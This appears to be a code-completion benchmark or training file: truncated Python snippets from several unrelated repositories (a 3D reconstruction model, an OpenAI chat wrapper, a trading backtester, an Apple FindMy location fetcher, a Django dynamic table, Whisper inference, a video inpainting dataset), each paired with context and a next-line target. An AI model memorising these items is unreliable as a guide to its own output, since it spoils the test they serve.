# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# https://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
class CameraEmbedder(nn.Module):
"""
Embed camera features to a high-dimensional vector.
Reference:
DiT: https://github.com/facebookresearch/DiT/blob/main/models.py#L27
"""
def __init__(self, raw_dim: int, embed_dim: int):
super().__init__()
self.mlp = nn.Sequential(
nn.Linear(raw_dim, embed_dim),
nn.SiLU(),
nn.Linear(embed_dim, embed_dim),
)
def forward(self, x):
return self.mlp(x)
class LRMGenerator(nn.Module):
"""
Full model of the large reconstruction model.
"""
def __init__(self, camera_embed_dim: int, rendering_samples_per_ray: int,
transformer_dim: int, transformer_layers: int, transformer_heads: int,
triplane_low_res: int, triplane_high_res: int, triplane_dim: int,
encoder_freeze: bool = True, encoder_model_name: str = 'facebook/dino-vitb16', encoder_feat_dim: int = 768):
super().__init__()
# attributes
self.encoder_feat_dim = encoder_feat_dim
self.camera_embed_dim = camera_embed_dim
# modules
self.encoder = DinoWrapper(
model_name=encoder_model_name,
freeze=encoder_freeze,
)
self.camera_embedder = CameraEmbedder(
raw_dim=12+4, embed_dim=camera_embed_dim,
)
self.transformer = TriplaneTransformer(
inner_dim=transformer_dim, num_layers=transformer_layers, num_heads=transformer_heads,
image_feat_dim=encoder_feat_dim,
camera_embed_dim=camera_embed_dim,
triplane_low_res=triplane_low_res, triplane_high_res=triplane_high_res, triplane_dim=triplane_dim,
) | self.synthesizer = TriplaneSynthesizer( | 2 | 2023-12-21 16:30:19+00:00 | 4k |
garinops/chat-E-AI | ai/openai/chat.py | [
{
"identifier": "OpenAITools",
"path": "ai/openai/tools/tools.py",
"snippet": "class OpenAITools:\n\n @staticmethod\n def get_tools() -> list:\n tools = []\n for tool_config in OPENAI_TOOLS_CONFIG:\n if tool_config[\"enable\"]:\n tool_class = tool_config[\"T... | import json
import backoff as backoff
import openai
from collections import deque
from dotenv import load_dotenv
from openai import OpenAI
from ai.openai.tools.tools import OpenAITools
from ai.openai.utils.key import OpenAIUtilsKey
from common.log import LogUtils
from config.settings import OPENAI_MODEL_DICTS, OPENAI_SYSTEM_CONTENT, OPENAI_API_RATE_LIMITS, OPENAI_BASE_URL
from models.response import ResponseAI
from utils.calculate import UtilsCalculate | 1,755 |
# 加载 .env 文件
load_dotenv()
# 日志logger
loggerOpenAI = LogUtils.new_logger("openai-Chat")
loggerBackoff = LogUtils.new_logger("library-backoff")
class AIOpenAIChat:
def __init__(self):
# 创建一个客户端实例
self.client = OpenAI(
api_key=OpenAIUtilsKey.get_key_in_env() if OpenAIUtilsKey.get_key_in_env() else OpenAIUtilsKey.get_key_in_config(),
base_url=OPENAI_BASE_URL if OPENAI_BASE_URL else None
)
self.model = OPENAI_MODEL_DICTS["Name"]
self.msgSys = OPENAI_SYSTEM_CONTENT
self.msgSysChck = True
self.msgUserAssi = deque()
self.messages = []
self.tools = OpenAITools.get_tools()
self.responseAI = ResponseAI(
answer="",
source="OpenAI",
aiCost=0,
aiCostCurrency=OPENAI_MODEL_DICTS['UnitCurrency']
)
def __setattr__(self, name, value):
"""messageContentUserAssistant更新则更新messages"""
if name == "msgUserAssi":
messages_system = [{
"role": "system",
"content": self.msgSys
}]
self.messages = messages_system + list(value)
# 执行默认赋值操作
super().__setattr__(name, value)
# 调用
def response(self):
self.responseAI = ResponseAI(
answer="",
source="OpenAI",
aiCost=0,
aiCostCurrency=OPENAI_MODEL_DICTS['UnitCurrency']
)
"""捕获openai.RateLimitError,回退重试。"""
def _backoff_jitter(rate) -> float:
_jitter = (60 / OPENAI_API_RATE_LIMITS) if OPENAI_API_RATE_LIMITS!=0 else 0
return _jitter
@backoff.on_exception(backoff.expo,
openai.RateLimitError,
max_time=60,
jitter=_backoff_jitter,
raise_on_giveup=False,
logger=loggerBackoff)
def inner_function():
try:
response_chat_completion = self.client.chat.completions.create(
model=self.model,
messages=self.messages,
tools=self.tools,
tool_choice="auto"
)
# Cost模块
prompt_tokens = response_chat_completion.usage.prompt_tokens
completion_tokens = response_chat_completion.usage.completion_tokens
|
# 加载 .env 文件
load_dotenv()
# 日志logger
loggerOpenAI = LogUtils.new_logger("openai-Chat")
loggerBackoff = LogUtils.new_logger("library-backoff")
class AIOpenAIChat:
def __init__(self):
# 创建一个客户端实例
self.client = OpenAI(
api_key=OpenAIUtilsKey.get_key_in_env() if OpenAIUtilsKey.get_key_in_env() else OpenAIUtilsKey.get_key_in_config(),
base_url=OPENAI_BASE_URL if OPENAI_BASE_URL else None
)
self.model = OPENAI_MODEL_DICTS["Name"]
self.msgSys = OPENAI_SYSTEM_CONTENT
self.msgSysChck = True
self.msgUserAssi = deque()
self.messages = []
self.tools = OpenAITools.get_tools()
self.responseAI = ResponseAI(
answer="",
source="OpenAI",
aiCost=0,
aiCostCurrency=OPENAI_MODEL_DICTS['UnitCurrency']
)
def __setattr__(self, name, value):
"""messageContentUserAssistant更新则更新messages"""
if name == "msgUserAssi":
messages_system = [{
"role": "system",
"content": self.msgSys
}]
self.messages = messages_system + list(value)
# 执行默认赋值操作
super().__setattr__(name, value)
# 调用
def response(self):
self.responseAI = ResponseAI(
answer="",
source="OpenAI",
aiCost=0,
aiCostCurrency=OPENAI_MODEL_DICTS['UnitCurrency']
)
"""捕获openai.RateLimitError,回退重试。"""
def _backoff_jitter(rate) -> float:
_jitter = (60 / OPENAI_API_RATE_LIMITS) if OPENAI_API_RATE_LIMITS!=0 else 0
return _jitter
@backoff.on_exception(backoff.expo,
openai.RateLimitError,
max_time=60,
jitter=_backoff_jitter,
raise_on_giveup=False,
logger=loggerBackoff)
def inner_function():
try:
response_chat_completion = self.client.chat.completions.create(
model=self.model,
messages=self.messages,
tools=self.tools,
tool_choice="auto"
)
# Cost模块
prompt_tokens = response_chat_completion.usage.prompt_tokens
completion_tokens = response_chat_completion.usage.completion_tokens | self.responseAI.aiCost = self.responseAI.aiCost + UtilsCalculate.cal_token_cost( | 8 | 2023-12-16 17:02:13+00:00 | 4k |
ruudjuffermans/Event-Driven-Backtester | backtester/loop.py | [
{
"identifier": "MarketEvent",
"path": "backtester/events.py",
"snippet": "class MarketEvent(Event):\n \"\"\"\n Handles the event of receiving a new market update with corresponding bars.\n \"\"\"\n\n def __init__(self):\n \"\"\"\n Initialises the MarketEvent.\n \"\"\"\n... | import pprint
import queue
import time
from .events import MarketEvent, SignalEvent, OrderEvent, FillEvent
from .generator import CSVGenerator | 1,965 |
class Loop:
def __init__(
self,
data_handler,
execution_handler,
portfolio,
strategy,
heartbeat,
):
self.heartbeat = heartbeat
self.data_handler = data_handler
self.execution_handler = execution_handler
self.portfolio = portfolio
self.strategy = strategy
self.events = queue.Queue()
self.signals = 0
self.orders = 0
self.fills = 0
self.num_strats = 1
self._set_datahandler()
self._set_portfolio()
self._set_execution_handler()
self._set_strategy()
def _set_datahandler(self):
if isinstance(self.data_handler, CSVGenerator):
self.data_handler.register(self.events)
else:
raise NotImplementedError("Data feed not implemented")
def _set_strategy(self):
self.strategy.register(self.data_handler, self.events)
def _set_portfolio(self):
self.portfolio.register(self.data_handler, self.events)
def _set_execution_handler(self):
self.execution_handler.register(self.events)
def _run_backtest(self):
"""
Executes the backtest.
"""
while True:
if self.data_handler.continue_backtest:
self.data_handler.update_bars()
else:
break
while True:
try:
event = self.events.get(False)
except queue.Empty:
break
else:
if event is not None:
|
class Loop:
def __init__(
self,
data_handler,
execution_handler,
portfolio,
strategy,
heartbeat,
):
self.heartbeat = heartbeat
self.data_handler = data_handler
self.execution_handler = execution_handler
self.portfolio = portfolio
self.strategy = strategy
self.events = queue.Queue()
self.signals = 0
self.orders = 0
self.fills = 0
self.num_strats = 1
self._set_datahandler()
self._set_portfolio()
self._set_execution_handler()
self._set_strategy()
def _set_datahandler(self):
if isinstance(self.data_handler, CSVGenerator):
self.data_handler.register(self.events)
else:
raise NotImplementedError("Data feed not implemented")
def _set_strategy(self):
self.strategy.register(self.data_handler, self.events)
def _set_portfolio(self):
self.portfolio.register(self.data_handler, self.events)
def _set_execution_handler(self):
self.execution_handler.register(self.events)
def _run_backtest(self):
"""
Executes the backtest.
"""
while True:
if self.data_handler.continue_backtest:
self.data_handler.update_bars()
else:
break
while True:
try:
event = self.events.get(False)
except queue.Empty:
break
else:
if event is not None: | if isinstance(event, MarketEvent): | 0 | 2023-12-16 21:09:00+00:00 | 4k |
liebrandapps/FindMyGUI | findmy/request_reports.py | [
{
"identifier": "icloud_login_mobileme",
"path": "findmy/pypush_gsa_icloud.py",
"snippet": "def icloud_login_mobileme(ctx, second_factor='sms'):\n username = ctx.cfg.appleId_appleId\n password = ctx.cfg.appleId_password\n anisetteUrl = ctx.cfg.general_anisetteHost + \":\" + str(ctx.cfg.general_... | import base64
import datetime
import hashlib
import json
import os
import struct
import requests
from cryptography.hazmat.backends import default_backend
from cryptography.hazmat.primitives.asymmetric import ec
from cryptography.hazmat.primitives.ciphers import Cipher, algorithms, modes
from findmy.pypush_gsa_icloud import icloud_login_mobileme, generate_anisette_headers | 1,703 |
class FindMy:
def __init__(self, ctx):
self.ctx = ctx
def sha256(self, data):
digest = hashlib.new("sha256")
digest.update(data)
return digest.digest()
def decrypt(self, enc_data, algorithm_dkey, mode):
decryptor = Cipher(algorithm_dkey, mode, default_backend()).decryptor()
return decryptor.update(enc_data) + decryptor.finalize()
def decode_tag(self, data):
latitude = struct.unpack(">i", data[0:4])[0] / 10000000.0
longitude = struct.unpack(">i", data[4:8])[0] / 10000000.0
confidence = int.from_bytes(data[8:9], 'big')
status = int.from_bytes(data[9:10], 'big')
return {'lat': latitude, 'lon': longitude, 'conf': confidence, 'status': status}
def getAuth(self, regenerate=False, second_factor='sms'):
CONFIG_PATH = os.path.dirname(os.path.realpath(__file__)) + "/auth.json"
if os.path.exists(CONFIG_PATH) and not regenerate:
with open(CONFIG_PATH, "r") as f:
j = json.load(f)
else:
mobileme = None
try:
mobileme = icloud_login_mobileme(self.ctx, second_factor=second_factor)
except requests.exceptions.ConnectionError as e:
msg = f"[ICLOUD] Anisette Server not running: {str(e)}"
self.ctx.errMsg = msg
self.ctx.log.error(msg)
if mobileme is None:
return None
j = {'dsid': mobileme['dsid'],
'searchPartyToken': mobileme['delegates']['com.apple.mobileme']['service-data']['tokens'][
'searchPartyToken']}
with open(CONFIG_PATH, "w") as f:
json.dump(j, f)
return (j['dsid'], j['searchPartyToken'])
def retrieveLocations(self):
privkeys = {}
names = {}
for tag in self.ctx.airtags.values():
hashedKey = tag.hashedAdvKey
privkeys[hashedKey] = tag.privateKey
names[hashedKey] = tag.name
unixEpoch = int(datetime.datetime.now().strftime('%s'))
startdate = unixEpoch - (60 * 60 * 24)
data = {"search": [{"startDate": startdate * 1000, "endDate": unixEpoch * 1000, "ids": list(names.keys())}]}
auth = self.getAuth(regenerate=False,
second_factor='trusted_device' if self.ctx.cfg.general_trustedDevice else 'sms')
if auth is None:
return
r = requests.post("https://gateway.icloud.com/acsnservice/fetch",
auth=auth,
|
class FindMy:
def __init__(self, ctx):
self.ctx = ctx
def sha256(self, data):
digest = hashlib.new("sha256")
digest.update(data)
return digest.digest()
def decrypt(self, enc_data, algorithm_dkey, mode):
decryptor = Cipher(algorithm_dkey, mode, default_backend()).decryptor()
return decryptor.update(enc_data) + decryptor.finalize()
def decode_tag(self, data):
latitude = struct.unpack(">i", data[0:4])[0] / 10000000.0
longitude = struct.unpack(">i", data[4:8])[0] / 10000000.0
confidence = int.from_bytes(data[8:9], 'big')
status = int.from_bytes(data[9:10], 'big')
return {'lat': latitude, 'lon': longitude, 'conf': confidence, 'status': status}
def getAuth(self, regenerate=False, second_factor='sms'):
CONFIG_PATH = os.path.dirname(os.path.realpath(__file__)) + "/auth.json"
if os.path.exists(CONFIG_PATH) and not regenerate:
with open(CONFIG_PATH, "r") as f:
j = json.load(f)
else:
mobileme = None
try:
mobileme = icloud_login_mobileme(self.ctx, second_factor=second_factor)
except requests.exceptions.ConnectionError as e:
msg = f"[ICLOUD] Anisette Server not running: {str(e)}"
self.ctx.errMsg = msg
self.ctx.log.error(msg)
if mobileme is None:
return None
j = {'dsid': mobileme['dsid'],
'searchPartyToken': mobileme['delegates']['com.apple.mobileme']['service-data']['tokens'][
'searchPartyToken']}
with open(CONFIG_PATH, "w") as f:
json.dump(j, f)
return (j['dsid'], j['searchPartyToken'])
def retrieveLocations(self):
privkeys = {}
names = {}
for tag in self.ctx.airtags.values():
hashedKey = tag.hashedAdvKey
privkeys[hashedKey] = tag.privateKey
names[hashedKey] = tag.name
unixEpoch = int(datetime.datetime.now().strftime('%s'))
startdate = unixEpoch - (60 * 60 * 24)
data = {"search": [{"startDate": startdate * 1000, "endDate": unixEpoch * 1000, "ids": list(names.keys())}]}
auth = self.getAuth(regenerate=False,
second_factor='trusted_device' if self.ctx.cfg.general_trustedDevice else 'sms')
if auth is None:
return
r = requests.post("https://gateway.icloud.com/acsnservice/fetch",
auth=auth, | headers=generate_anisette_headers(self.ctx.cfg.general_anisetteHost+":"+str(self.ctx.cfg.general_anisettePort)), | 1 | 2023-12-16 12:39:52+00:00 | 4k |
aliosmankaya/shakespeare-gpt | inference.py | [
{
"identifier": "decode",
"path": "data.py",
"snippet": "def get_batch(split):"
},
{
"identifier": "GPT",
"path": "network.py",
"snippet": "class GPT(nn.Module):\n def __init__(self, config):\n super().__init__()\n assert config.vocab_size is not None\n assert con... | import torch
from data import decode, vocab_size
from network import GPT, GPTConfig
from parameters import * | 2,469 |
model_args = dict(
n_layer=n_layer,
n_head=n_head,
n_embd=n_embd,
block_size=block_size,
bias=bias,
vocab_size=vocab_size,
dropout=dropout,
)
|
model_args = dict(
n_layer=n_layer,
n_head=n_head,
n_embd=n_embd,
block_size=block_size,
bias=bias,
vocab_size=vocab_size,
dropout=dropout,
)
| gptconf = GPTConfig(**model_args) | 2 | 2023-12-17 17:54:31+00:00 | 4k |
Samuel-Effiong/Django-Dynamic-Table | django_dynamic_table/models.py | [
{
"identifier": "TableHaveNoRow",
"path": "django_dynamic_table/errors.py",
"snippet": "class TableHaveNoRow(DynamicTableError):\r\n pass\r"
},
{
"identifier": "TableHaveNoColumn",
"path": "django_dynamic_table/errors.py",
"snippet": "class TableHaveNoColumn(DynamicTableError):\r\n ... | from typing import Sequence
from datetime import datetime
from django.db import models
from django.utils import timezone
from django.utils.translation import gettext_lazy as _
from .errors import (
TableHaveNoRow, TableHaveNoColumn, ColumnNotInTable,
RowNotInTable, DuplicateColumnInTable, DynamicTableError,
UnSupportedDataType, CantParseValueToDataType, CellDoesNotExist
)
| 2,436 | if not isinstance(row_index, (int, type(None))):
raise TypeError("Row index value must be an integer")
try:
if row_index is None:
row = self.table_rows.last()
else:
row = self.table_rows.get(pk=row_index)
except TableRow.DoesNotExist:
raise RowNotInTable()
else:
# remove row from the table
self.table_rows.remove(row)
# delete the removed row and all the cells associated with it
row.delete()
return row
def get_cell(self, column_name, row_index):
if isinstance(row_index, str):
row_index = int(row_index)
if not self.is_column(column_name):
raise ColumnNotInTable()
try:
cell = CellValue.objects.get(
table=self,
table_column__column_name=column_name,
table_row_id=row_index
)
return cell
except CellValue.DoesNotExist:
raise CellDoesNotExist
def get_column_cells(self, column_name):
if not self.is_column(column_name):
raise ColumnNotInTable()
column = TableColumn.objects.get(table=self, column_name=column_name)
column_cells = column.column_cells.all()
return list(column_cells)
def get_row_cells(self, row_index):
if isinstance(row_index, str):
row_index = int(row_index)
try:
row = TableRow.objects.get(table=self, id=row_index)
row_cells = row.row_cells.all()
except TableRow.DoesNotExist:
raise RowNotInTable()
return list(row_cells)
class TableColumn(models.Model):
table = models.ForeignKey(DynamicTable, on_delete=models.CASCADE)
column_name = models.CharField(max_length=255, unique=True)
column_data_type = models.CharField(max_length=15, choices=__SUPPORTED_DATA_TYPE_CHOICES__)
column_cells = models.ManyToManyField('CellValue', blank=True)
def __str__(self):
return f"{self.column_name}: {self.column_data_type} -- {self.table}"
def _get_column_values(self):
return self.column_cells.all()
class TableRow(models.Model):
table = models.ForeignKey(DynamicTable, on_delete=models.CASCADE)
row_cells = models.ManyToManyField('CellValue', blank=True)
def __str__(self):
return f"{self.table} Table: Row no. {self.id}"
def to_dict(self):
values = {
item.column.column_name: item.value
for item in self.row_cells.all()
}
return values
class CellValue(models.Model):
"""Synonymous with the cell in a spreadsheet, it contains the value of the
table along with relevant information about it position in the table"""
value = models.TextField(blank=True)
table = models.ForeignKey(DynamicTable, on_delete=models.CASCADE)
table_column = models.ForeignKey(TableColumn, on_delete=models.CASCADE)
table_row = models.ForeignKey(TableRow, blank=True, on_delete=models.CASCADE)
def __str__(self):
return self.value
def save(self, force_insert=False, force_update=False, using=None, update_fields=None):
self.full_clean()
super(CellValue, self).save()
def clean(self):
super(CellValue, self).clean()
self.__validate_data_type__(self.value, self.table_column.column_data_type)
def __validate_data_type__(self, value, data_type):
"""
Ensures that the values is saved in the database in the format that
can be easily be converted to the desired data type
"""
if data_type == 'char' or data_type == 'textfield':
self.value = str(value)
elif data_type == 'int':
if not isinstance(value, int):
try:
if value:
self.value = int(float(value))
else:
self.value = ""
except ValueError:
| """
Creating a Dynamic Table using conventional Django standard
This Table gives you more control over it manipulation than Django models
Developed by: Samuel Effiong Nkopuruk
Email: senai.nkop@gmail.com
"""
__SUPPORTED_DATA_TYPE_CHOICES__ = (
('char', 'Char'),
('int', 'Int'),
('float', 'Float'),
('bool', 'Bool'),
('textfield', 'TextField'),
('date', 'Date'),
)
# Create your models here.
class DynamicTable(models.Model):
table_name = models.CharField(_('Table Name'), max_length=255, unique=True)
table_description = models.TextField(_('Table Description'), blank=True)
date_created = models.DateTimeField(_('Date Created'), default=timezone.now)
table_columns = models.ManyToManyField('TableColumn', blank=True)
table_rows = models.ManyToManyField('TableRow', blank=True)
class Meta:
ordering = ('-date_created', )
def __str__(self) -> str:
return f"{self.table_name}"
def __total_table_rows(self) -> int:
field = self.table_columns.first()
if field and isinstance(field, TableColumn):
return self.table_columns.all().count()
else:
# the table is empty
return 0
def __total_table_columns(self) -> int:
return self.table_columns.all().count()
def table_info(self) -> dict[str, int]:
description = {
'rows': self.__total_table_rows(),
'columns': self.__total_table_columns()
}
return description
def is_empty(self) -> bool:
table_info = self.table_info()
rows = table_info['rows']
columns = table_info['columns']
return True if columns == 0 or rows == 0 else False
def is_column(self, column_name: str) -> bool:
if not isinstance(column_name, str):
raise ValueError("column name must be a str")
try:
column = self.table_columns.get(column_name=column_name)
return True
except TableColumn.DoesNotExist:
return False
def get_supported_data_types(self) -> list[str]:
return [data_type[0] for data_type in __SUPPORTED_DATA_TYPE_CHOICES__]
def data_type_is_supported(self, data_type: str | list) -> bool | list[bool]:
supported_data_types = self.get_supported_data_types()
if isinstance(data_type, str):
return data_type.lower().strip() in supported_data_types
elif isinstance(data_type, (list, tuple, set)):
return [_type.lower().strip() in supported_data_types for _type in data_type]
else:
raise ValueError('arg must be either a str or a sequence')
def add_column(self, column_name: str, data_type: str):
if isinstance(column_name, str) and isinstance(data_type, str):
if not self.data_type_is_supported(data_type):
raise UnSupportedDataType()
if self.is_column(column_name):
raise DuplicateColumnInTable()
table_column = TableColumn(
table=self,
column_name=column_name,
column_data_type=data_type
)
table_column.save()
self.table_columns.add(table_column)
return table_column
else:
raise DynamicTableError("argument must be str, use self.bulk_add_columns to add multiple columns")
def bulk_add_columns(self, column_names: Sequence[str], data_types: Sequence[str]):
allowed_argument_type = (list, tuple, set)
if isinstance(column_names, allowed_argument_type) and isinstance(data_types, allowed_argument_type):
if len(column_names) != len(data_types):
raise DynamicTableError(f"len({column_names}) = {len(column_names)} != len({data_types}) = {len(data_types)}")
else:
# check if list of data_types contains any unsupported data type
supported_data_type = self.data_type_is_supported(data_types)
if False in supported_data_type:
raise UnSupportedDataType(f"{data_types} data type that are supported are: {supported_data_type}")
else:
# check if the provided column names contain duplicates, raise an error if it does
unique_column_names = set(column_names)
if len(column_names) != len(unique_column_names):
raise DuplicateColumnInTable()
is_column = [self.is_column(column) for column in column_names]
if True in is_column:
raise DuplicateColumnInTable()
columns = [
TableColumn.objects.create(
table=self,
column_name=column_name,
column_data_type=data_type
)
for column_name, data_type in zip(column_names, data_types, strict=True)
# the above further exception should not be activated, but adding it there,
# if just in case, for some unknown reason it escape the other safeguard.
]
self.table_columns.add(*columns)
return columns
else:
raise DynamicTableError("argument must be a sequence. use self.add_column to add a single column")
def add_row(self, value: dict):
if not isinstance(value, dict):
raise ValueError(f"{value} is not a list or a dict")
if self.__total_table_columns() == 0:
raise TableHaveNoColumn()
row = []
table_row = TableRow.objects.create(table=self)
for table_column in self.table_columns.all():
cell_value = value.get(table_column.column_name, "")
cell = CellValue.objects.create(
value=cell_value, table=self,
table_column=table_column,
table_row=table_row
)
row.append(cell)
# add cell to column
table_column.column_cells.add(cell)
# add cell to row
table_row.row_cells.add(*row)
# add row to table
self.table_rows.add(table_row)
return table_row
def bulk_add_rows(self, values: Sequence[dict]) -> list:
if not isinstance(values, (list, tuple, set)):
raise ValueError('values must be a sequence of dict')
rows = []
for row in values:
if not isinstance(row, dict):
raise ValueError('values must be a sequence of dict')
if self.__total_table_columns() == 0:
raise TableHaveNoColumn()
rows.append(self.add_row(row))
return rows
def delete_column(self, column_name):
# using get instead of filter if for some reason the unique parameter
# was disabled in the table column definition, this will doubly ensure
# that the field are unique else it will always raise an error if it
# encounter duplicates column names
if not isinstance(column_name, str):
raise ValueError('column_name must be a str')
try:
column = self.table_columns.get(column_name=column_name)
except TableColumn.MultipleObjectsReturned:
raise DuplicateColumnInTable()
except TableColumn.DoesNotExist:
raise ColumnNotInTable()
else:
# remove column from the table
self.table_columns.remove(column)
# delete the removed column and all the cells associated with it
column.delete()
return column
def delete_row(self, row_index=None):
"""if row_index is None remove the last row"""
if not isinstance(row_index, (int, type(None))):
raise TypeError("Row index value must be an integer")
try:
if row_index is None:
row = self.table_rows.last()
else:
row = self.table_rows.get(pk=row_index)
except TableRow.DoesNotExist:
raise RowNotInTable()
else:
# remove row from the table
self.table_rows.remove(row)
# delete the removed row and all the cells associated with it
row.delete()
return row
def get_cell(self, column_name, row_index):
if isinstance(row_index, str):
row_index = int(row_index)
if not self.is_column(column_name):
raise ColumnNotInTable()
try:
cell = CellValue.objects.get(
table=self,
table_column__column_name=column_name,
table_row_id=row_index
)
return cell
except CellValue.DoesNotExist:
raise CellDoesNotExist
def get_column_cells(self, column_name):
if not self.is_column(column_name):
raise ColumnNotInTable()
column = TableColumn.objects.get(table=self, column_name=column_name)
column_cells = column.column_cells.all()
return list(column_cells)
def get_row_cells(self, row_index):
if isinstance(row_index, str):
row_index = int(row_index)
try:
row = TableRow.objects.get(table=self, id=row_index)
row_cells = row.row_cells.all()
except TableRow.DoesNotExist:
raise RowNotInTable()
return list(row_cells)
class TableColumn(models.Model):
table = models.ForeignKey(DynamicTable, on_delete=models.CASCADE)
column_name = models.CharField(max_length=255, unique=True)
column_data_type = models.CharField(max_length=15, choices=__SUPPORTED_DATA_TYPE_CHOICES__)
column_cells = models.ManyToManyField('CellValue', blank=True)
def __str__(self):
return f"{self.column_name}: {self.column_data_type} -- {self.table}"
def _get_column_values(self):
return self.column_cells.all()
class TableRow(models.Model):
table = models.ForeignKey(DynamicTable, on_delete=models.CASCADE)
row_cells = models.ManyToManyField('CellValue', blank=True)
def __str__(self):
return f"{self.table} Table: Row no. {self.id}"
def to_dict(self):
values = {
item.column.column_name: item.value
for item in self.row_cells.all()
}
return values
class CellValue(models.Model):
"""Synonymous with the cell in a spreadsheet, it contains the value of the
table along with relevant information about it position in the table"""
value = models.TextField(blank=True)
table = models.ForeignKey(DynamicTable, on_delete=models.CASCADE)
table_column = models.ForeignKey(TableColumn, on_delete=models.CASCADE)
table_row = models.ForeignKey(TableRow, blank=True, on_delete=models.CASCADE)
def __str__(self):
return self.value
def save(self, force_insert=False, force_update=False, using=None, update_fields=None):
self.full_clean()
super(CellValue, self).save()
def clean(self):
super(CellValue, self).clean()
self.__validate_data_type__(self.value, self.table_column.column_data_type)
def __validate_data_type__(self, value, data_type):
"""
Ensures that the values is saved in the database in the format that
can be easily be converted to the desired data type
"""
if data_type == 'char' or data_type == 'textfield':
self.value = str(value)
elif data_type == 'int':
if not isinstance(value, int):
try:
if value:
self.value = int(float(value))
else:
self.value = ""
except ValueError:
| raise CantParseValueToDataType(f"{value} to {data_type}")
| 7 | 2023-12-19 15:50:38+00:00 | 4k |
mohame54/Speech-Transcriber-App | whisper/whisper.py | [
{
"identifier": "Inference",
"path": "whisper/decoding.py",
"snippet": "class Inference:\n \"\"\"\n Class for handling sequence generation inference.\n\n Attributes:\n encoder: ONNX runtime inference session for the encoder.\n decoder: ONNX runtime inference session for the decode... | from typing import Literal, Union, Tuple, Optional, List
from transformers import WhisperFeatureExtractor, WhisperTokenizer
from dataclasses import dataclass
from .decoding import Inference, GreedyDecoding, BeamSearchDecoding, Hypothesis
import soxr
import soundfile as sf
import numpy as np
import wget
import os | 3,532 |
# LOCAL
@dataclass
class WhisperConfig:
"""
Configuration class for the WhisperInference module.
Attributes:
- encoder_path: Path to the encoder model.
- decoder_path: Path to the decoder model.
- model_id: Model identifier, default is "openai/whisper-base" this is the only one supported for now.
- transcribption_mode: Language mode, default is "English".
- decoding: Decoding mode, default is "greedy".
- beam_size: Beam size for beam search decoding, default is 5.
- eos_id: End-of-sequence token ID, default is 50257.
- temperature: Temperature for decoding, default is 1.0.
- top_p: Top-p sampling parameter, default is 0.98.
- length_penalty: Length penalty for beam search decoding, default is 2.0.
"""
encoder_path: str
decoder_path: str
model_id: str = "openai/whisper-base"
transcribption_mode: Literal["English", "Arabic"] = "English"
decoding: Literal["greedy", "beam"] = "greedy"
beam_size: int = 5
eos_id: int = 50257
temperature: float = 1.0
top_p: float = 0.98
length_penalty: float = 2.0
class WhisperInference:
"""
Inference module for transcribing audio using the Whisper model.
Attributes:
- processor: WhisperFeatureExtractor for extracting features from audio.
- tokenizer: WhisperTokenizer for tokenizing transcriptions.
- decoding: Decoding strategy based on the selected mode.
"""
def __init__(
self,
config: WhisperConfig
):
"""
Initializes the WhisperInference module.
Args:
- config: WhisperConfig object containing model configuration.
"""
# Initialize feature extractor and tokenizer
self.processor = WhisperFeatureExtractor.from_pretrained(config.model_id)
self.tokenizer = WhisperTokenizer.from_pretrained(
config.model_id,
language=config.transcribption_mode,
task="transcribe",
)
self.config = config
self.inference = Inference(
self.config.encoder_path,
self.config.decoder_path,
self.config.transcribption_mode,
)
self.set_decoding()
def set_decoding(self, decoding: Optional[str]= None):
# Initialize inference and decoding strategy based on the selected mode
decoding = decoding if decoding is not None else self.config.decoding
if decoding == "greedy":
|
# LOCAL
@dataclass
class WhisperConfig:
"""
Configuration class for the WhisperInference module.
Attributes:
- encoder_path: Path to the encoder model.
- decoder_path: Path to the decoder model.
- model_id: Model identifier, default is "openai/whisper-base" this is the only one supported for now.
- transcribption_mode: Language mode, default is "English".
- decoding: Decoding mode, default is "greedy".
- beam_size: Beam size for beam search decoding, default is 5.
- eos_id: End-of-sequence token ID, default is 50257.
- temperature: Temperature for decoding, default is 1.0.
- top_p: Top-p sampling parameter, default is 0.98.
- length_penalty: Length penalty for beam search decoding, default is 2.0.
"""
encoder_path: str
decoder_path: str
model_id: str = "openai/whisper-base"
transcribption_mode: Literal["English", "Arabic"] = "English"
decoding: Literal["greedy", "beam"] = "greedy"
beam_size: int = 5
eos_id: int = 50257
temperature: float = 1.0
top_p: float = 0.98
length_penalty: float = 2.0
class WhisperInference:
"""
Inference module for transcribing audio using the Whisper model.
Attributes:
- processor: WhisperFeatureExtractor for extracting features from audio.
- tokenizer: WhisperTokenizer for tokenizing transcriptions.
- decoding: Decoding strategy based on the selected mode.
"""
def __init__(
self,
config: WhisperConfig
):
"""
Initializes the WhisperInference module.
Args:
- config: WhisperConfig object containing model configuration.
"""
# Initialize feature extractor and tokenizer
self.processor = WhisperFeatureExtractor.from_pretrained(config.model_id)
self.tokenizer = WhisperTokenizer.from_pretrained(
config.model_id,
language=config.transcribption_mode,
task="transcribe",
)
self.config = config
self.inference = Inference(
self.config.encoder_path,
self.config.decoder_path,
self.config.transcribption_mode,
)
self.set_decoding()
def set_decoding(self, decoding: Optional[str]= None):
# Initialize inference and decoding strategy based on the selected mode
decoding = decoding if decoding is not None else self.config.decoding
if decoding == "greedy": | self.decoding = GreedyDecoding( | 1 | 2023-12-16 13:35:51+00:00 | 4k |
YaoFANGUK/video-subtitle-remover | backend/tools/train/dataset_sttn.py | [
{
"identifier": "ZipReader",
"path": "backend/tools/train/utils_sttn.py",
"snippet": "class ZipReader(object):\n file_dict = dict()\n\n def __init__(self):\n super(ZipReader, self).__init__()\n\n @staticmethod\n def build_file_dict(path):\n file_dict = ZipReader.file_dict\n ... | import os
import json
import random
import torch
import torchvision.transforms as transforms
from torch.utils.data import DataLoader
from backend.tools.train.utils_sttn import ZipReader, create_random_shape_with_random_motion
from backend.tools.train.utils_sttn import Stack, ToTorchFormatTensor, GroupRandomHorizontalFlip | 1,934 |
# 自定义的数据集
class Dataset(torch.utils.data.Dataset):
def __init__(self, args: dict, split='train', debug=False):
# 初始化函数,传入配置参数字典,数据集划分类型,默认为'train'
self.args = args
self.split = split
self.sample_length = args['sample_length'] # 样本长度参数
self.size = self.w, self.h = (args['w'], args['h']) # 设置图像的目标宽高
# 打开存放数据相关信息的json文件
with open(os.path.join(args['data_root'], args['name'], split+'.json'), 'r') as f:
self.video_dict = json.load(f) # 加载json文件内容
self.video_names = list(self.video_dict.keys()) # 获取视频的名称列表
